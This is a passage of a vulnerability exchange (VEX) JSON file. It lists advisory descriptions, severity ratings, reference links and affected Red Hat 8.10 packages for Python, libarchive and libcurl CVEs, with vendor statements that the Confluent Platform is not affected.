      "description": "The \"profiling.sampling\" module (Python 3.15+) and \"asyncio introspection capabilities\" (3.14+, \"python -m asyncio ps\" and \"python -m asyncio pstree\") features could be used to read and write addresses in a privileged process if that process connected to a malicious or \"infected\" Python process via the remote debugging feature. This vulnerability requires persistently and repeatedly connecting to the process to be exploited, even after the connecting process crashes with high likelihood due to ASLR.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5713"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/15/6"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19019"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19176"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5713"
        },
        {
          "url": "https://bugzilla.redhat.com/2431367"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/2458239"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458239"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0865"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5713"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19019.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19176"
        },
        {
          "url": "https://github.com/python/cpython/commit/289fd2c97a7e5aecb8b69f94f5e838ccfeee7e67"
        },
        {
          "url": "https://github.com/python/cpython/commit/316f6265b7f9ca4ffed5346b747475ef1943f35d"
        },
        {
          "url": "https://github.com/python/cpython/issues/148178"
        },
        {
          "url": "https://github.com/python/cpython/pull/148187"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-5713.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19176.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/OG4RHARYSNIE22GGOMVMCRH76L5HKPLM/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5713"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5713"
        }
      ],
      "published": "2026-04-14T16:16:48+00:00",
      "updated": "2026-07-31T14:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5745",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "A flaw was found in libarchive. A NULL pointer dereference vulnerability exists in the ACL parsing logic, specifically within the archive_acl_from_text_nl() function. When processing a malformed ACL string (such as a bare \"d\" or \"default\" tag without subsequent fields), the function fails to perform adequate validation before advancing the pointer. An attacker can exploit this by providing a maliciously crafted archive, causing an application utilizing the libarchive API (such as bsdtar) to crash, resulting in a Denial of Service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5745"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8944"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5745"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455921"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5745"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8581-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5745"
        }
      ],
      "published": "2026-04-07T16:16:32+00:00",
      "updated": "2026-06-17T10:59:35+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5773",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        918
      ],
      "description": "libcurl might in some circumstances reuse the wrong connection for SMB(S)\ntransfers.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criteria must be met. Due to a logical\nerror in the code, a network transfer operation that was requested by an\napplication could wrongfully reuse an existing SMB connection to the same\nserver that was using a different 'share' than the new subsequent transfer\nshould.\n\nThis could in unlucky situations lead to the download of the wrong file or the\nupload of a file to the wrong place. When this happens, the same credentials\nare used and the server name is the same.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5773"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5773"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5773.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5773.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-rp9q-8q5w-ch44"
        },
        {
          "url": "https://hackerone.com/reports/3650689"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5773"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5773"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T10:59:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
